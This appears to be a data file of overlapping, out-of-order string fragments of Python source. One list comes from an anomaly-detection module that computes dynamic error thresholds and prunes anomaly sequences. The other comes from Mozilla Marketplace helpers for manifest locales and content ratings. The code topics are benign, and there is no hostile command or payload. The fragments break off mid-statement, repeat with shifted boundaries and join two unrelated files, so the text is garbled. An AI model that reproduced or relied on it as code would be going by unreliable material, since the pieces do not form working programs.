"= [(g[0], g[-1]) for g in groups if g[0] != g[-1]] return e_seq,",
"forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent",
"# This was done in the implementation of NASA paper but # wasn't",
"for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x]",
"len(above_epsilon)) # update the largest epsilon we've seen so far if epsilon >",
"[list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups",
"i, anomalies_indices, error_buffer ) # get anomalies from inverse of smoothed errors #",
"(int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned errors should be",
"sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from inverse of smoothed errors",
"number of standard deviations above mean(smoothed_errors) # here we iterate in increments of",
"g in groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq,",
"delta std # these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e",
"e < epsilon: # save to compute delta mean and delta std #",
"not in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i - j) #",
"anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0],",
"std # these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e >",
"= len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts",
"the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon",
"mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z * sigma)",
"len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer):",
"anomalies_indices, error_buffer ) # get anomalies from inverse of smoothed errors # This",
"anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies",
"sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors)",
"epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest",
"# sd_threshold can be multiplied by sigma to get epsilon return max_epsilon, sd_threshold",
"weren't identified as anomalies to process them for i in range(len(smoothed_errors)): adjusted_index =",
"ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true)",
"window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true,",
"window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies",
"inverse of smoothed errors # This was done in the implementation of NASA",
"for g in anomalies_groups if not g[0] == g[-1]] # generate \"scores\" for",
"not an anomaly continue for j in range(error_buffer): if (i + j) <",
"# compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer,",
"if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1]",
"i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range:",
"referenced in the paper # we get the inverse by flipping around the",
"below_indices.append(i) if e > epsilon: # above_epsilon values are anomalies for j in",
"anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size",
"def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which don't",
"smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list):",
"by flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu",
"batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index",
"are below epsilon and which # weren't identified as anomalies to process them",
"> max_error_below_e and adjusted_index not in all_anomalies: if i not in anomaly_indices: max_error_below_e",
"(mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've",
"delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if",
"if epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold can",
"> epsilon: # above_epsilon values are anomalies for j in range(0, error_buffer): if",
"(window_size * batch_size) + (i * batch_size) if i == num_windows + 1:",
"(int): Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s)",
"0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max)",
"to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer):",
"into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)]",
"model is trained enough anomaly_indices = [] max_error_below_e = 0 for i in",
"[(g[0], g[-1]) for g in groups if not g[0] == g[-1]] mean_perc_decrease =",
"= [] for i in range(len(errors)): left_window = i - historical_error_window right_window =",
"epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices,",
") if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices )",
"e_seq[index] pruned_indices = [] for i in anomaly_indices: for error_seq in e_seq: if",
"range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not",
"len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0:",
"smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which don't meet a",
"* z) below_epsilon, below_indices, above_epsilon = [], [], [] for i in range(len(smoothed_errors)):",
"continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq",
"< 0: left_window = 0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window]))",
"sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i in anomaly_indices: for error_seq",
"epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores",
"= [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score =",
"epsilon for each sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator =",
"more_itertools as mit import numpy as np # Methods to do dynamic error",
"If smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true",
"1 if left_window < 0: left_window = 0 if right_window > len(errors): right_window",
"(len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size)",
"= np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The",
"(sigma * z) below_epsilon, below_indices, above_epsilon = [], [], [] for i in",
"lower_percentile minimum_index = 100 # have a cutoff value for anomalies until model",
"to compute delta mean and delta std # these are important for epsilon",
"anomaly_indices = [] max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <=",
"above_epsilon and (i - j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) ==",
"j) < len(smoothed_errors) and (i + j) not in anomaly_indices: if (i +",
"num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices = [] for",
"- j) not in above_epsilon and (i - j) >= 0: above_epsilon.append(i -",
"around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e)",
"range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method",
"window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e,",
"was done in the implementation of NASA paper but # wasn't referenced in",
"in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i",
"error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma ="
] |
[
"descriptor slugs by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results =",
"\"\"\" {body.id, rating.id} to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except",
"defaultdict import commonware.log from amo.utils import find_language import mkt log = commonware.log.getLogger('z.webapps') def",
"locale_dict = {} for locale in manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale]",
"\"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to",
"'-').split('-', 1) if label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List",
"keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and remove body prefix. body,",
"if obj: # Slugify and remove body prefix. body, label = key.lower().replace('_', '-').split('-',",
"return dict(results) def dehydrate_interactives(keys): \"\"\" List of keys to list of interactive slugs.",
"locale in manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add",
"sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label.",
"...}. \"\"\" results = defaultdict(list) for key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if",
"= mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings",
"of keys to list of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\"",
"{'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list) for key in keys: obj =",
"content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to lists of descriptor slugs",
"List of keys to lists of descriptor slugs by body. ['ESRB_BLOOD, ...] to",
"def dehydrate_interactives(keys): \"\"\" List of keys to list of interactive slugs. ['SOCIAL_NETWORKING', ...]",
"default locale name. default = manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default",
"= dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to lists",
"\"\"\" List of keys to lists of descriptor slugs by body. ['ESRB_BLOOD, ...]",
"amo.utils import find_language import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict",
"body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug 943371). return",
"return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated",
"content ratings from rating IDs to dict.\"\"\" for body in content_ratings or {}:",
"manifest['locales'][locale][property] # Add in the default locale name. default = manifest.get('default_locale') or default_locale",
"['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results = [] for key in keys:",
"content_ratings or {}: # Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings",
"or default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default] = root_property return",
"= root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of locales found",
"['blood'], ...}. \"\"\" results = defaultdict(list) for key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key)",
"= mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and remove body prefix. body, label =",
"Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\"",
"the \"locales\" property of the manifest. This will convert locales found in the",
"of descriptor slugs by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results",
"for locale in manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] #",
"= defaultdict(list) for key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify",
"return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from rating IDs",
"get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for locale in manifest.get('locales', {}): if property",
"format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings):",
"dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to lists of",
"= [] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if obj: results.append(key.lower().replace('_', '-'))",
"list of locales found in the \"locales\" property of the manifest. This will",
"in the \"locales\" property of the manifest. This will convert locales found in",
"import find_language import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict =",
"def get_supported_locales(manifest): \"\"\" Returns a list of locales found in the \"locales\" property",
"their full locale. It will also remove locales not found in AMO_LANGUAGES. Note:",
"{}): if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in the default",
"will also remove locales not found in AMO_LANGUAGES. Note: The default_locale is not",
"get_supported_locales(manifest): \"\"\" Returns a list of locales found in the \"locales\" property of",
"943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an",
"# Slugify and remove body prefix. body, label = key.lower().replace('_', '-').split('-', 1) if",
"and remove body prefix. body, label = key.lower().replace('_', '-').split('-', 1) if label !=",
"= manifest.get(property) if default and root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest):",
"try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug 943371).",
"default and root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a",
"find_language import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict = {}",
"from collections import defaultdict import commonware.log from amo.utils import find_language import mkt log",
"coding: utf-8 -*- from collections import defaultdict import commonware.log from amo.utils import find_language",
"...]. \"\"\" results = [] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if",
"= manifest['locales'][locale][property] # Add in the default locale name. default = manifest.get('default_locale') or",
"\"locales\" property of the manifest. This will convert locales found in the SHORTER_LANGUAGES",
"obj: # Slugify and remove body prefix. body, label = key.lower().replace('_', '-').split('-', 1)",
"dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])])",
"if default and root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns",
"SHORTER_LANGUAGES setting to their full locale. It will also remove locales not found",
"except TypeError: # Legacy ES format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating(",
"of the manifest. This will convert locales found in the SHORTER_LANGUAGES setting to",
"slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results = [] for key in",
"mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from",
"in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and remove body prefix.",
"1) if label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List of",
"!= 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List of keys to list",
"dehydrate_interactives(keys): \"\"\" List of keys to list of interactive slugs. ['SOCIAL_NETWORKING', ...] to",
"-*- coding: utf-8 -*- from collections import defaultdict import commonware.log from amo.utils import",
"{} for locale in manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property]",
"remove body prefix. body, label = key.lower().replace('_', '-').split('-', 1) if label != 'no-descs':",
"manifest. This will convert locales found in the SHORTER_LANGUAGES setting to their full",
"from amo.utils import find_language import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None):",
"(bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate",
"property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in the default locale name.",
"This will convert locales found in the SHORTER_LANGUAGES setting to their full locale.",
"in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in the default locale name. default",
"Legacy ES format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label",
"{} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of",
"The default_locale is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def",
"from rating IDs to dict.\"\"\" for body in content_ratings or {}: # Dehydrate",
"dehydrate_descriptors(keys, body=None): \"\"\" List of keys to lists of descriptor slugs by body.",
"results = defaultdict(list) for key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: #",
"# -*- coding: utf-8 -*- from collections import defaultdict import commonware.log from amo.utils",
"return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of locales found in the",
"property of the manifest. This will convert locales found in the SHORTER_LANGUAGES setting",
"keys to lists of descriptor slugs by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'],",
"'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List of keys to list of",
"included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id}",
"for key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and remove",
"body in content_ratings or {}: # Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body])",
"if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in the default locale",
"Returns a list of locales found in the \"locales\" property of the manifest.",
"to their full locale. It will also remove locales not found in AMO_LANGUAGES.",
"['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list) for key in",
"an object of content ratings from rating IDs to dict.\"\"\" for body in",
"utf-8 -*- from collections import defaultdict import commonware.log from amo.utils import find_language import",
"{body.id, rating.id} to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError:",
"manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in the default locale name. default =",
"import commonware.log from amo.utils import find_language import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest,",
"to list of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results =",
"of content ratings from rating IDs to dict.\"\"\" for body in content_ratings or",
"import defaultdict import commonware.log from amo.utils import find_language import mkt log = commonware.log.getLogger('z.webapps')",
"mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and remove body prefix. body, label = key.lower().replace('_',",
"body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from rating",
"locales found in the SHORTER_LANGUAGES setting to their full locale. It will also",
"return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object",
"key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and remove body",
"label = key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label) return dict(results) def",
"\"\"\" List of keys to list of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking',",
"{}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\" try: body =",
"set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\" try:",
"mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for locale",
"name. default = manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and root_property:",
"\"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug",
"ratings from rating IDs to dict.\"\"\" for body in content_ratings or {}: #",
"of keys to lists of descriptor slugs by body. ['ESRB_BLOOD, ...] to {'esrb':",
"label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List of keys to",
"content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of",
"results = [] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if obj: results.append(key.lower().replace('_',",
"in AMO_LANGUAGES. Note: The default_locale is not included. \"\"\" return sorted(filter(None, map(find_language, set(",
"to lists of descriptor slugs by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}.",
"object of content ratings from rating IDs to dict.\"\"\" for body in content_ratings",
"ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of keys",
"in the default locale name. default = manifest.get('default_locale') or default_locale root_property = manifest.get(property)",
"found in AMO_LANGUAGES. Note: The default_locale is not included. \"\"\" return sorted(filter(None, map(find_language,",
"to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list) for key in keys: obj",
"body, label = key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label) return dict(results)",
"List of keys to list of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...].",
"interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results = [] for key",
"...] to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list) for key in keys:",
"commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for locale in manifest.get('locales', {}):",
"log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for locale in",
"def get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for locale in manifest.get('locales', {}): if",
"defaultdict(list) for key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and",
"the SHORTER_LANGUAGES setting to their full locale. It will also remove locales not",
"# Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None):",
"will convert locales found in the SHORTER_LANGUAGES setting to their full locale. It",
"= {} for locale in manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] =",
"map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\"",
"setting to their full locale. It will also remove locales not found in",
"in the SHORTER_LANGUAGES setting to their full locale. It will also remove locales",
"IDs to dict.\"\"\" for body in content_ratings or {}: # Dehydrate all content",
"collections import defaultdict import commonware.log from amo.utils import find_language import mkt log =",
"def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body(",
"if label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List of keys",
"keys to list of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results",
"to dict.\"\"\" for body in content_ratings or {}: # Dehydrate all content ratings.",
"Add in the default locale name. default = manifest.get('default_locale') or default_locale root_property =",
"\"\"\" Returns a list of locales found in the \"locales\" property of the",
"is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\"",
"locale_dict[locale] = manifest['locales'][locale][property] # Add in the default locale name. default = manifest.get('default_locale')",
"['social-networking', ...]. \"\"\" results = [] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key)",
"slugs by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list)",
"results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List of keys to list of interactive",
"manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\" try: body",
"to ['social-networking', ...]. \"\"\" results = [] for key in keys: obj =",
"content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to",
"manifest.get(property) if default and root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\"",
"dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from rating IDs to dict.\"\"\" for",
"found in the SHORTER_LANGUAGES setting to their full locale. It will also remove",
"rating.id} to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: #",
"TypeError: # Legacy ES format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])])",
"obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and remove body prefix. body, label",
"rating IDs to dict.\"\"\" for body in content_ratings or {}: # Dehydrate all",
"return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to lists of descriptor",
"lists of descriptor slugs by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\"",
"locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of locales found in the \"locales\"",
"locale. It will also remove locales not found in AMO_LANGUAGES. Note: The default_locale",
"the manifest. This will convert locales found in the SHORTER_LANGUAGES setting to their",
"ES format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def",
"dict(results) def dehydrate_interactives(keys): \"\"\" List of keys to list of interactive slugs. ['SOCIAL_NETWORKING',",
"[] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if obj: results.append(key.lower().replace('_', '-')) return",
"locale name. default = manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and",
"not found in AMO_LANGUAGES. Note: The default_locale is not included. \"\"\" return sorted(filter(None,",
"\"\"\"Dehydrate an object of content ratings from rating IDs to dict.\"\"\" for body",
"= mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug 943371). return {}",
"locales not found in AMO_LANGUAGES. Note: The default_locale is not included. \"\"\" return",
"a list of locales found in the \"locales\" property of the manifest. This",
"of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results = [] for",
"property, default_locale=None): locale_dict = {} for locale in manifest.get('locales', {}): if property in",
"body=None): \"\"\" List of keys to lists of descriptor slugs by body. ['ESRB_BLOOD,",
"= manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default] =",
"def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to lists of descriptor slugs by",
"key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\"",
"rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content",
"root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of",
"\"\"\" results = defaultdict(list) for key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj:",
"to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy",
"AMO_LANGUAGES. Note: The default_locale is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales',",
"default = manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default]",
"and root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list",
"mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug 943371). return {} rating =",
"def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from rating IDs to dict.\"\"\"",
